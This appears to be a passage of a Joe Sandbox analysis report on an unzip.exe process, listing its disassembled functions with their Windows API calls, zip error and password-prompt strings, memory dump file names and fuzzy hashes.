sprintf.MSVCRT ref: 00410D0B

Strings

[%s]: Zipfile is disk %u of a multi-disk archive, and this is not the disk on which the central zipfile directory begins (disk %u)., xrefs: 00410C88
%, xrefs: 00410CCD, 00410D24
warning [%s]: end-of-central-directory record claims this is disk %u but that the central directory starts on disk %u; this is a contradiction. Attempting to process anyway., xrefs: 00410CDF

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$_close
String ID: [%s]: Zipfile is disk %u of a multi-disk archive, and this is not the disk on which the central zipfile directory begins (disk %u).$warning [%s]: end-of-central-directory record claims this is disk %u but that the central directory starts on disk %u; this is a contradiction. Attempting to process anyway.$%
API String ID: 2034629209-575469096
Opcode ID: ddb0b8232b87d312cf4cbae5dfecbddd7486fcb55a749138862b0317ecaef6bf
Instruction ID: d9d35142a555182aa0673e208bf7c7a60f201a3b36df4122fba9a9b3575d04d6
Opcode Fuzzy Hash: ddb0b8232b87d312cf4cbae5dfecbddd7486fcb55a749138862b0317ecaef6bf
Instruction Fuzzy Hash: 0B214FB0A097219BC3109F16E04016EBBE1FBD4794F95C82FE4C897310DBB998859F9E

Function 0042113C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00421152
GetProcAddress.KERNEL32 ref: 00421167
FreeLibrary.KERNEL32 ref: 004211A9
GetLastError.KERNEL32 ref: 004211BD

Strings

GetCompressedFileSizeA, xrefs: 0042115C
KERNEL32, xrefs: 0042114B

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Library$AddressErrorFreeLastLoadProc
String ID: GetCompressedFileSizeA$KERNEL32
API String ID: 2540614322-4165569768
Opcode ID: 158fc3d24393bbf3444d11455d28f692ddf7f84d6856e093306df38be71ba070
Instruction ID: df6b6d4cf1a9b6ec57c42e6b45cfede6d9bdf456364b156616e6d9d2dd37b1d5
Opcode Fuzzy Hash: 158fc3d24393bbf3444d11455d28f692ddf7f84d6856e093306df38be71ba070
Instruction Fuzzy Hash: C601F972B043205BD714BE7A784112BBAD5ABD8354F42463FED98C3300E6349819878A

Function 0041DE10 Relevance: 10.5, APIs: 7, Instructions: 47fileCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0041DE27

Part of subcall function 0041EA10: _errno.MSVCRT ref: 0041EA39

_errno.MSVCRT ref: 0041DE56
DeleteFileA.KERNEL32(?,?,?,?,?,?,0041DDFF,?,?,?,?,?,?,0040A14D), ref: 0041DE60
_errno.MSVCRT ref: 0041DE83
_errno.MSVCRT ref: 0041DE91
_chmod.MSVCRT ref: 0041DEAB
_errno.MSVCRT ref: 0041DEB2

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _errno$DeleteFile_chmod
String ID:
API String ID: 1134905301-0
Opcode ID: 99cbe4b31921c99f8b24ef363c60db1b85113ee2ec91c992f7a639cbfeb77f02
Instruction ID: 2c33a73cea0e029776a6b2dc72e55494118e22c18f70160586e079d154c22659
Opcode Fuzzy Hash: 99cbe4b31921c99f8b24ef363c60db1b85113ee2ec91c992f7a639cbfeb77f02
Instruction Fuzzy Hash: 3D11A5F0A04B118BC300BF26948126BBAE47F54308F82485EE8854F352D73C89858BAB

Function 0041D2EC Relevance: 10.5, APIs: 5, Strings: 2, Instructions: 43stringCOMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 0041D16A
sprintf.MSVCRT ref: 0041D18B
strcat.MSVCRT ref: 0041D263
strcat.MSVCRT ref: 0041D273
strcat.MSVCRT ref: 0041D2D1

Strings

s 98, xrefs: 0041D258
ndow, xrefs: 0041D16F

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strcat$sprintf
String ID: ndow$s 98
API String ID: 1824314822-516953310
Opcode ID: 93c626f6bbc57c431ba74cb46d7c763649740612a73f4500ae431ca96d886e30
Instruction ID: 3a4e0fc56ebbcde46fcbc944b4d7059ee9f6ea63b19f8e8b6a865c5b1e5574f9
Opcode Fuzzy Hash: 93c626f6bbc57c431ba74cb46d7c763649740612a73f4500ae431ca96d886e30
Instruction Fuzzy Hash: 6E111CB0609710DBC3209F15E8802AEBBE1BB84354F91C82FE98917251C77C988ADB5E

Function 0041A509 Relevance: 10.5, APIs: 3, Strings: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00409B40: CharToOemA.USER32 ref: 00409B83

Part of subcall function 00409B40: mblen.MSVCRT ref: 00409BA3

sprintf.MSVCRT ref: 0041A4A1
free.MSVCRT ref: 0041A4D0
free.MSVCRT ref: 0041A4DE

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 0041A528
checkdir error: %s exists but is not directory unable to process %s., xrefs: 0041A55C
%, xrefs: 0041A4BA
jre/jre-1.8/lib/deploy/email.js, xrefs: 0041A530

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: free$Charmblensprintf
String ID: %$checkdir error: %s exists but is not directory unable to process %s.$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 2208677967-2279305575
Opcode ID: 6c7e4fb50c929a2d3920e3592b326af1e814bdf5e94e66d47fb9b871f85b6823
Instruction ID: 4b035e945c65f3dba9bc9c052b4253789db7a0e47c37fe89de286715ee272d1a
Opcode Fuzzy Hash: 6c7e4fb50c929a2d3920e3592b326af1e814bdf5e94e66d47fb9b871f85b6823
Instruction Fuzzy Hash: 1A01C8B1509710AFC300AF15E45426EBBE0BF84314F81D82EE58957352CBBC9884DF5E

Function 0040ABD7 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00409B40: CharToOemA.USER32 ref: 00409B83

sprintf.MSVCRT ref: 0040AC0A
fgets.MSVCRT ref: 0040AC49

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 0040ABE3
%, xrefs: 0040AC23
%s: write error (disk full?). Continue? (y/n/^C) , xrefs: 0040ABFB
jre/jre-1.8/lib/deploy/email.js, xrefs: 0040ABEB

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Charfgetssprintf
String ID: %$%s: write error (disk full?). Continue? (y/n/^C) $jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 357299328-2870516294
Opcode ID: 8b1a522359001ab131fcc4114f14ad97ec45c9148c1caa1aca2b3c5980fae798
Instruction ID: 058efcfdbcab16e2533ab0c418980487d527644c355ff5f6af8269abdc684df0
Opcode Fuzzy Hash: 8b1a522359001ab131fcc4114f14ad97ec45c9148c1caa1aca2b3c5980fae798
Instruction Fuzzy Hash: 09F0FBB0509711AFC300AF15E44421EBBE0FBC4714F80C91EE4C85B251D7BC4484DB9A

Function 0041ADE0 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 17COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 0041AE22

Strings

3.3.1 (mingw special 20030804-1), xrefs: 0041AE03
(32-bit), xrefs: 0041ADF3
Windows 95 / Windows NT, xrefs: 0041ADFB
on , xrefs: 0041ADEB
%, xrefs: 0041AE3B
mingw32 / gcc , xrefs: 0041AE0B

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: Windows 95 / Windows NT$ (32-bit)$ on $%$3.3.1 (mingw special 20030804-1)$mingw32 / gcc
API String ID: 590974362-2719779361
Opcode ID: 89e2c84bb6523f8e00c3cb679f42be2ed7af498599cddab5813b2af998025d4f
Instruction ID: b2499cfe0b459b7fb2ec32ab7cc6dbc8c20cdc659942f7ddfc8646880ed9bc8a
Opcode Fuzzy Hash: 89e2c84bb6523f8e00c3cb679f42be2ed7af498599cddab5813b2af998025d4f
Instruction Fuzzy Hash: BCF028B050AB11AFC300DF15A14825EBFE1EBD0759F80C81EE4941A651D7BC859C8FDB

Function 0041E390 Relevance: 9.2, APIs: 6, Instructions: 156COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0041E5BC
_errno.MSVCRT ref: 0041E6AC

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 6a67f7bfaee60129d708e3c97872a43be0f90c59a575d805b400c6f85e36204d
Instruction ID: af54639a282df3ae510c65a9b71cb9d29443bbfb17eec3ceb0b4e0930da71bd3
Opcode Fuzzy Hash: 6a67f7bfaee60129d708e3c97872a43be0f90c59a575d805b400c6f85e36204d
Instruction Fuzzy Hash: 2D5163797041019BD3009B5AE400276F6A2BB84354FA5863BEC4587394FB39E8A7978F

Function 0041C050 Relevance: 9.1, APIs: 6, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,0041AA37), ref: 0041C09D
GetSecurityDescriptorLength.ADVAPI32(?,?,?,0041AA37), ref: 0041C0D9
GetProcessHeap.KERNEL32(?,?,?,?,0041AA37), ref: 0041C0E9
HeapFree.KERNEL32 ref: 0041C0FF
LeaveCriticalSection.KERNEL32(?,?,?,0041AA37), ref: 0041C11A
GetSecurityDescriptorLength.ADVAPI32(?,?,?,0041AA37), ref: 0041C130

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: CriticalDescriptorHeapLengthSectionSecurity$EnterFreeLeaveProcess
String ID:
API String ID: 1157510307-0
Opcode ID: b671a52fed02e9cb0403ce31f077dd338002bedc8622b8144869fcb00baabf23
Instruction ID: a3906efcae999020a6db9ee5d9273a9a3450f4a312fcbbe45dec1390408a3382
Opcode Fuzzy Hash: b671a52fed02e9cb0403ce31f077dd338002bedc8622b8144869fcb00baabf23
Instruction Fuzzy Hash: 6B2119B56057108BD310AF25D98176BBBF4FF88348F11892EEC8947301D779A955CF8A

Function 004230A0 Relevance: 9.1, APIs: 6, Instructions: 59memoryfileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 004230C5
GetLogicalDriveStringsA.KERNEL32 ref: 004230DF
GetProcessHeap.KERNEL32 ref: 004230E9
HeapAlloc.KERNEL32 ref: 004230FD
GetLogicalDriveStringsA.KERNEL32 ref: 0042310E
fopen.MSVCRT ref: 00423138

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: DriveHeapLogicalStringsfopen$AllocProcess
String ID:
API String ID: 1776155995-0
Opcode ID: 794a8529efdb55d6acff4c2978ce69114720e86932d564a1038880161ad45e7a
Instruction ID: d9f00afda5e7283c1a607f3a14641e8af24f6981f773d8832ea0482954f1cdbd
Opcode Fuzzy Hash: 794a8529efdb55d6acff4c2978ce69114720e86932d564a1038880161ad45e7a
Instruction Fuzzy Hash: E20184717193204AC340BF79A58532B7BF4EB84799F85483EE888C3306E63CD505875A

Function 0040B0AC Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040B07A

Part of subcall function 00409B40: CharToOemA.USER32 ref: 00409B83

Part of subcall function 00409B40: mblen.MSVCRT ref: 00409BA3

malloc.MSVCRT ref: 0040B0C2
sprintf.MSVCRT ref: 0040B10C

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 0040B0E1
[%s] %s password: , xrefs: 0040B101
Enter password: , xrefs: 0040B0B6

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Charfreemallocmblensprintf
String ID: Enter password: $[%s] %s password: $jre/jre-1.8/lib/deploy/email.js
API String ID: 2844381872-1553844718
Opcode ID: ee0f816cb5622b73e54bed563e30c1b21c137ed1919b1e6a835c3ac91dae56cf
Instruction ID: 434ded98b2c809fc6d851d2665fe76bcf7d3386fc544e2ce378173351f391d9a
Opcode Fuzzy Hash: ee0f816cb5622b73e54bed563e30c1b21c137ed1919b1e6a835c3ac91dae56cf
Instruction Fuzzy Hash: 8611DA746097509BC710AF15C18021FFBE0BF89754F85C92EEAD867392D7789D448B8A

Function 0041CE0C Relevance: 9.0, APIs: 6, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 0041CDFC
GetProcessHeap.KERNEL32 ref: 0041CE10
HeapAlloc.KERNEL32 ref: 0041CE28
GetKernelObjectSecurity.ADVAPI32 ref: 0041CE51
GetProcessHeap.KERNEL32 ref: 0041CE5D
HeapFree.KERNEL32 ref: 0041CE71
SetKernelObjectSecurity.ADVAPI32 ref: 0041CE8D

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Heap$KernelObjectProcessSecurity$AllocCloseFreeHandle
String ID:
API String ID: 115221720-0
Opcode ID: aa65fafd4a123ddb09062bd7af306829524bcb80a276a7a71a65ca0e9015bdbc
Instruction ID: 86ac7074f7ceef6ec83df3227b01edf35bff083c8d3731e9295cb8913224c337
Opcode Fuzzy Hash: aa65fafd4a123ddb09062bd7af306829524bcb80a276a7a71a65ca0e9015bdbc
Instruction Fuzzy Hash: 8101FFB19487519BC300BF3AE58122FBFE4AF84358F51893EE88983211D778D5948B47

Function 00421DBE Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147stringCOMMON

Download Yara Rule

APIs

_stricmp.MSVCRT ref: 00421B6D
strncpy.MSVCRT ref: 00421CDA
strncpy.MSVCRT ref: 00421CF8
strncpy.MSVCRT ref: 00421D19

Strings

Z, xrefs: 00421D08

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strncpy$_stricmp
String ID: Z
API String ID: 3544235267-1505515367
Opcode ID: 29712d63cc465c4a3b0314377746fd2dbf7136a129c34a65c157b95a1f91678e
Instruction ID: 95603bc183c38f1ccd6c6c39e081a8f7f52f8ffd1c376a1296f2602387ec5688
Opcode Fuzzy Hash: 29712d63cc465c4a3b0314377746fd2dbf7136a129c34a65c157b95a1f91678e
Instruction Fuzzy Hash: 8171BBB4A087509FC324DF1AC18065AFBE1BFC8314F91992EE8D997351D7B5A841CF86

Function 0040A230 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64stringCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,073AE000,00000000,00410ECD,?,?,?,?,00410655), ref: 0040A275
_read.MSVCRT ref: 0040A2AF
strlen.MSVCRT ref: 0040A2E5

Strings

error: zipfile read error, xrefs: 0040A2DE, 0040A2F6
%, xrefs: 0040A2FE

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _readmemcpystrlen
String ID: %$error: zipfile read error
API String ID: 53173439-1257676847
Opcode ID: a0fd976f21df5642296013301b98e0a299704f8050c407cfb7814bcddcea1724
Instruction ID: b5b4c5112d5b8e6a69816ff17e1a2942545d847f42e26ea3b5e0af003eae1c6f
Opcode Fuzzy Hash: a0fd976f21df5642296013301b98e0a299704f8050c407cfb7814bcddcea1724
Instruction Fuzzy Hash: 9221D170A063109BC340AF29D98411BFBF0FBD4704F50E47EE88493391DB79A802CBAA

Function 0040B88C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON

Download Yara Rule

APIs

OemToCharA.USER32 ref: 0040B7CC
sprintf.MSVCRT ref: 0040B84A
mblen.MSVCRT ref: 0040B8A0
_isctype.MSVCRT ref: 0040B8EF
tolower.MSVCRT ref: 0040B90A
sprintf.MSVCRT ref: 0040B954

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 0040B823
%, xrefs: 0040B863
jre/jre-1.8/lib/deploy/email.js, xrefs: 0040B82B

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$Char_isctypemblentolower
String ID: %$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 1200023797-1688794020
Opcode ID: a6dab6ec9ddd7206e1d5cac04a6a2209f5e7d022e21c5fabb4321146476d5aa4
Instruction ID: 0ef343bec47ddff5b2cff692c381f19410af95a516f2e7f2b795d58b956b20e8
Opcode Fuzzy Hash: a6dab6ec9ddd7206e1d5cac04a6a2209f5e7d022e21c5fabb4321146476d5aa4
Instruction Fuzzy Hash: CB115E705097509AC320AF25944422EBBE4FF95714F54C96FE8E4273A1C77C8885DB9E

Function 00423250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 0042328A
_errno.MSVCRT ref: 004232A7
printf.MSVCRT ref: 004232D2
_errno.MSVCRT ref: 004232D7

Strings

__fxstat64: bad file descriptor %d, xrefs: 004232CB

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _errno$_get_osfhandleprintf
String ID: __fxstat64: bad file descriptor %d
API String ID: 2219541454-715598309
Opcode ID: 09660fb2b3b92d736e45d6f3acafe67308fead73c156e9698039ffb18e2b256d
Instruction ID: 615f0134aec3f2285cb1f600d631928cbe972964d82bbc3313fa343cda34b6f4
Opcode Fuzzy Hash: 09660fb2b3b92d736e45d6f3acafe67308fead73c156e9698039ffb18e2b256d
Instruction Fuzzy Hash: CB012D74A087218BC300DF19D54011ABBE1BF88714F95499EE88863351C7789E458BAB

Function 0040BA09 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21stringCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0040BA10
strerror.MSVCRT ref: 0040BA1A
sprintf.MSVCRT ref: 0040BA3C

Strings

%, xrefs: 0040BA55
error: cannot open zipfile [ %s ] %s, xrefs: 0040BA29

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _errnosprintfstrerror
String ID: %$error: cannot open zipfile [ %s ] %s
API String ID: 1421824330-907563490
Opcode ID: d39cab5a19498269bc00777aa4bbd82049295e7a1c50ee6f14b760c9debf3879
Instruction ID: 6bb510f7fc0e817ba57ce7f18e59feeda11cdd03f859742df75abf87443aa76f
Opcode Fuzzy Hash: d39cab5a19498269bc00777aa4bbd82049295e7a1c50ee6f14b760c9debf3879
Instruction Fuzzy Hash: A8F0F8B0609B109FC300AF15D44026EBBE1FB84344FC1C82EE58857321CBBC9885CF8A

Function 0041DC10 Relevance: 7.9, APIs: 5, Instructions: 392COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0041DC90
malloc.MSVCRT ref: 0041DC9E
_errno.MSVCRT ref: 0041DCA9
_errno.MSVCRT ref: 0041DCEC
malloc.MSVCRT ref: 0041DD58

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _errno$malloc
String ID:
API String ID: 1976470507-0
Opcode ID: f0dd30b688cabe6654a59698572ca6a6de3d8959cbb2a4a529b5c82d7b87b0d9
Instruction ID: 53517327ae29126b391797a5516d190a78ec233e1cdfb04e8bd4a1a8c46227c0
Opcode Fuzzy Hash: f0dd30b688cabe6654a59698572ca6a6de3d8959cbb2a4a529b5c82d7b87b0d9
Instruction Fuzzy Hash: 6BF13674A08790CFC720CF26C4842AABBE1BFC9714F54495EE899A7311D734A986CB96

